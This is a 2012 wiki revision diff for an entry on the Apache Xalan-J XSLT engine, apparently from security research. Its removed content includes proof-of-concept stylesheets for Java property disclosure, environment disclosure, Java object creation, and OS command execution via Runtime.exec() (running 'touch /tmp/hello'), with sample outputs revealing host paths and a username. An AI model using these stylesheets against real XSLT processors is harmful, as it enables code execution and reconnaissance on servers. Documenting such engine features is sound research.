Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35

From version Icon 45.1 Icon
edited by Nicolas Gregoire
on 2012/01/11 23:38
Change comment: Upload new attachment xalanj-java-date.xsl
To version 1.1 Icon
edited by Nicolas Gregoire
on 2012/01/04 18:56
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Tags
... ... @@ -1,1 +1,0 @@
1 -xslt|engine|apache|java|unsafe
Content
... ... @@ -1,67 +1,21 @@
1 1  [[Xalan-J>>http://xml.apache.org/xalan-j/||rel="__blank" title="Xalan-J Home Page"]] is a Java based XSLT engine by the Apache Project.
2 2  
3 3  
4 -== Supported version ==
4 +Supported XSLT version : 1.0
5 5  
6 -1.0
7 7  
8 -== Command line ==
7 +Identification strings
9 9  
10 -$> java org.apache.xalan.xslt.Process -in foo.xml -xsl foo.xsl
9 +| xsl:vendor-url|http:~/~/xml.apache.org/xalan-j
10 +| xsl:vendor|Apache Software Foundation
11 +| xsl:version|1.0
11 11  
12 -__Note__ : xml-apis.jar, xercesImpl.jar and xalan*.jar must be in the $CLASSPATH
13 13  
14 -== Identification strings ==
15 15  
16 -|=xsl:vendor-url|http:~/~/xml.apache.org/xalan-j
17 -|=xsl:vendor|Apache Software Foundation
18 -|=xsl:version|1.0
15 +Special features
19 19  
20 -== Special features ==
21 -
22 -* Java properties disclosure
23 -* Java environment disclosure
24 -* Java code execution
25 -* OS command execution
26 26  * File creation
18 +* Code execution
27 27  * JDBC connectivity
28 -
29 -== Java properties disclosure ==
30 -
31 -The xsl:system-property() standard function can be called with non standard arguments, mapped to Java properties. In this example, the name of the Java properties is stored in a separate XML file ([[properties.xml>>attach:properties.xml]]). The XSLT code will, for each property, display its name and its value.
32 -
33 -|=Namespace|=Function|=PoC|=Sample output
34 -|http:~/~/www.w3.org/1999/XSL/Transform|system-property()|[[xalanj-java-properties.xsl>>attach:xalanj-java-properties.xsl]]|[[xalanj-java-properties-output.txt>>attach:xalanj-java-properties-output.txt]]
35 -
36 -== Java environment disclosure ==
37 -
38 -The checkEnvironment() extension function (documented [[here>>http://xml.apache.org/xalan-j/faq.html#faq-N10064||rel="__blank"]]) will display some information about the execution context (including available packages, paths, versions, ...).
39 -
40 -|=Namespace|=Extension function|=PoC|=Sample output
41 -|http:~/~/xml.apache.org/xalan|checkEnvironment()|[[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]]|[[xalanj-checkenv-output.txt>>attach:xalanj-checkenv-output.txt]]
42 -
43 -== Java code execution ==
44 -
45 -The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.
46 -
47 -|=Namespace|=Extension function|=PoC|=Sample output
48 -|http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date:
49 -Wed Jan 11 22:45:07 CET 2012
50 -
51 -== OS command execution ==
52 -
53 -The following code will execute the command "touch /tmp/hello" :
54 -
55 -<?xml version="1.0"?>
56 -<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform"
57 - xmlns:j="http:~/~/xml.apache.org/xalan/java"
58 - exclude-result-prefixes="j"
59 - version="1.0">
60 - <xsl:template match="/">
61 - <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable>
62 - <xsl:variable name="a" select="j:split($c, ' = ')"/>
63 - <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/>
64 - <xsl:variable name="p" select="j:exec($r, $a )"/>
65 - No content at the moment ...
66 - </xsl:template>
67 -</xsl:stylesheet>
20 +* Java properties
21 +* CheckEnv()
Icon properties.xml
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -2.7 KB
Content
... ... @@ -1,73 +1,0 @@
1 -<properties>
2 -<property>awt.toolkit</property>
3 -<property>browser</property>
4 -<property>browser.vendor</property>
5 -<property>browser.version</property>
6 -<property>file.encoding</property>
7 -<property>file.encoding.pkg</property>
8 -<property>file.separator</property>
9 -<property>file.separator.applet</property>
10 -<property>http.agent</property>
11 -<property>java.awt.graphicsenv</property>
12 -<property>java.awt.printerjob</property>
13 -<property>java.class.path</property>
14 -<property>java.class.version</property>
15 -<property>java.class.version.applet</property>
16 -<property>java.endorsed.dirs</property>
17 -<property>java.ext.dirs</property>
18 -<property>java.home</property>
19 -<property>java.io.tmpdir</property>
20 -<property>java.library.path</property>
21 -<property>java.runtime.name</property>
22 -<property>java.runtime.version</property>
23 -<property>java.specification.name</property>
24 -<property>java.specification.vendor</property>
25 -<property>java.specification.version</property>
26 -<property>java.vendor</property>
27 -<property>java.vendor.applet</property>
28 -<property>java.vendor.url</property>
29 -<property>java.vendor.url.applet</property>
30 -<property>java.vendor.url.bug</property>
31 -<property>java.version</property>
32 -<property>java.version.applet</property>
33 -<property>java.vm.info</property>
34 -<property>java.vm.name</property>
35 -<property>java.vm.specification.name</property>
36 -<property>java.vm.specification.vendor</property>
37 -<property>java.vm.specification.version</property>
38 -<property>java.vm.vendor</property>
39 -<property>java.vm.version</property>
40 -<property>javax.accessibility.assistive_technologies</property>
41 -<property>line.separator</property>
42 -<property>line.separator.applet</property>
43 -<property>os.arch</property>
44 -<property>os.arch.applet</property>
45 -<property>os.name</property>
46 -<property>os.name.applet</property>
47 -<property>os.version</property>
48 -<property>os.version.applet</property>
49 -<property>package.restrict.definition.java</property>
50 -<property>package.restrict.definition.sun</property>
51 -<property>path.separator</property>
52 -<property>path.separator.applet</property>
53 -<property>sun.arch.data.model</property>
54 -<property>sun.boot.class.path</property>
55 -<property>sun.boot.library.path</property>
56 -<property>sun.cpu.endian</property>
57 -<property>sun.cpu.isalist</property>
58 -<property>sun.desktop</property>
59 -<property>sun.io.unicode.encoding</property>
60 -<property>sun.java.launcher</property>
61 -<property>sun.jnu.encoding</property>
62 -<property>sun.management.compiler</property>
63 -<property>sun.os.patch.level</property>
64 -<property>user.country</property>
65 -<property>user.dir</property>
66 -<property>user.home</property>
67 -<property>user.language</property>
68 -<property>user.name</property>
69 -<property>user.timezone</property>
70 -<property>user.variant</property>
71 -<property>user.zoneinfo.dir</property>
72 -</properties>
73 -
Icon xalanj-checkenv-output.txt
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -2.5 KB
Content
... ... @@ -1,31 +1,0 @@
1 -<?xml version="1.0" encoding="UTF-8"?><checkEnvironmentExtension>
2 - <EnvironmentCheck version="$Revision$">
3 - <environment>
4 - <item key="version.DOM.draftlevel">2.0fd</item>
5 - <item key="java.class.path">/usr/share/java/xalan2.jar:/usr/share/java/xml-apis.jar:/usr/share/java/xercesImpl.jar:/usr/share/java/serializer.jar:/usr/share/java/xsltc.jar</item>
6 - <item key="version.JAXP">1.1 or higher</item>
7 - <item key="java.ext.dirs">/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/ext:/usr/java/packages/lib/ext</item>
8 - <item key="version.xerces2">Xerces-J 2.9.1</item>
9 - <item key="version.xerces1">not-present</item>
10 - <item key="version.xalan2_2">Xalan Java 2.7.1</item>
11 - <item key="version.xalan1">not-present</item>
12 - <item key="version.ant">not-present</item>
13 - <item key="java.version">1.6.0_26</item>
14 - <item key="version.DOM">2.0</item>
15 - <item key="version.crimson">not-present</item>
16 - <item key="sun.boot.class.path">/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/resources.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/rt.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jsse.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jce.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/charsets.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/modules/jdk.boot.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/classes</item>
17 - <foundJar desc="apis.jar-apparent.version" name="xml">xml-apis.jar present-unknown-version</foundJar>
18 - <foundJar desc="apis.jar-path" name="xml">/usr/share/java/xml-apis.jar</foundJar>
19 - <foundJar desc="apparent.version" name="xercesImpl.jar">xercesImpl.jar WARNING.present-unknown-version</foundJar>
20 - <foundJar desc="path" name="xercesImpl.jar">/usr/share/java/xercesImpl.jar</foundJar>
21 - <foundJar desc="apparent.version" name="serializer.jar">serializer.jar present-unknown-version</foundJar>
22 - <foundJar desc="path" name="serializer.jar">/usr/share/java/serializer.jar</foundJar>
23 - <foundJar desc="apparent.version" name="xsltc.jar">xsltc.jar present-unknown-version</foundJar>
24 - <foundJar desc="path" name="xsltc.jar">/usr/share/java/xsltc.jar</foundJar>
25 - <item key="version.SAX">2.0</item>
26 - <item key="version.xalan2x">Xalan Java 2.7.1</item>
27 - </environment>
28 - <status result="OK"/>
29 - </EnvironmentCheck>
30 -</checkEnvironmentExtension>
31 -
Icon xalanj-checkenv.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -310 bytes
Content
... ... @@ -1,11 +1,0 @@
1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
2 - xmlns:xalan="http://xml.apache.org/xalan"
3 - version="1.0">
4 -
5 - <xsl:output method="xml" indent="yes" xalan:indent-amount="4"/>
6 - <xsl:template match="/">
7 - <xsl:copy-of select="xalan:checkEnvironment()"/>
8 - </xsl:template>
9 -
10 -</xsl:stylesheet>
11 -
Icon xalanj-java-date.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -409 bytes
Content
... ... @@ -1,11 +1,0 @@
1 -<xsl:stylesheet version="1.0"
2 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
3 - xmlns:date="http://xml.apache.org/xalan/java/java.util.Date"
4 - exclude-result-prefixes="date">
5 - <xsl:output method="text"/>
6 - <xsl:template match="/">
7 - <xsl:variable name="dateObject" select="date:new()"/>
8 - <xsl:text>Current date: </xsl:text><xsl:value-of select="$dateObject"/>
9 - </xsl:template>
10 -</xsl:stylesheet>
11 -
Icon xalanj-java-properties-output.txt
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -2.8 KB
Content
... ... @@ -1,73 +1,0 @@
1 -<?xml version="1.0" encoding="UTF-8"?>
2 -awt.toolkit:
3 -browser:
4 -browser.vendor:
5 -browser.version:
6 -file.encoding: UTF-8
7 -file.encoding.pkg: sun.io
8 -file.separator: /
9 -file.separator.applet:
10 -http.agent:
11 -java.awt.graphicsenv: sun.awt.X11GraphicsEnvironment
12 -java.awt.printerjob: sun.print.PSPrinterJob
13 -java.class.path: /usr/share/java/xalan2.jar:/usr/share/java/xml-apis.jar:/usr/share/java/xercesImpl.jar:/usr/share/java/serializer.jar:/usr/share/java/xsltc.jar
14 -java.class.version: 50.0
15 -java.class.version.applet:
16 -java.endorsed.dirs: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/endorsed
17 -java.ext.dirs: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/ext:/usr/java/packages/lib/ext
18 -java.home: /usr/lib/jvm/java-6-sun-1.6.0.26/jre
19 -java.io.tmpdir: /tmp
20 -java.library.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386/client:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib
21 -java.runtime.name: Java(TM) SE Runtime Environment
22 -java.runtime.version: 1.6.0_26-b03
23 -java.specification.name: Java Platform API Specification
24 -java.specification.vendor: Sun Microsystems Inc.
25 -java.specification.version: 1.6
26 -java.vendor: Sun Microsystems Inc.
27 -java.vendor.applet:
28 -java.vendor.url: http://java.sun.com/
29 -java.vendor.url.applet:
30 -java.vendor.url.bug: http://java.sun.com/cgi-bin/bugreport.cgi
31 -java.version: 1.6.0_26
32 -java.version.applet:
33 -java.vm.info: mixed mode, sharing
34 -java.vm.name: Java HotSpot(TM) Client VM
35 -java.vm.specification.name: Java Virtual Machine Specification
36 -java.vm.specification.vendor: Sun Microsystems Inc.
37 -java.vm.specification.version: 1.0
38 -java.vm.vendor: Sun Microsystems Inc.
39 -java.vm.version: 20.1-b02
40 -javax.accessibility.assistive_technologies:
41 -line.separator:
42 -
43 -line.separator.applet:
44 -os.arch: i386
45 -os.arch.applet:
46 -os.name: Linux
47 -os.name.applet:
48 -os.version: 2.6.32-37-generic
49 -os.version.applet:
50 -package.restrict.definition.java:
51 -package.restrict.definition.sun:
52 -path.separator: :
53 -path.separator.applet:
54 -sun.arch.data.model: 32
55 -sun.boot.class.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/resources.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/rt.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jsse.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jce.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/charsets.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/modules/jdk.boot.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/classes
56 -sun.boot.library.path: /usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/i386
57 -sun.cpu.endian: little
58 -sun.cpu.isalist:
59 -sun.desktop: gnome
60 -sun.io.unicode.encoding: UnicodeLittle
61 -sun.java.launcher: SUN_STANDARD
62 -sun.jnu.encoding: UTF-8
63 -sun.management.compiler: HotSpot Client Compiler
64 -sun.os.patch.level: unknown
65 -user.country: FR
66 -user.dir: /home/bob/foobar
67 -user.home: /home/bob
68 -user.language: fr
69 -user.name: bob
70 -user.timezone:
71 -user.variant:
72 -user.zoneinfo.dir:
73 -
Icon xalanj-java-properties.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -276 bytes
Content
... ... @@ -1,7 +1,0 @@
1 -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" >
2 - <xsl:template match="//property">
3 - <xsl:variable name="p" select="text()"/>
4 - <xsl:value-of select="$p"/>: <xsl:value-of select="system-property($p)"/>
5 - </xsl:template>
6 -</xsl:stylesheet>
7 -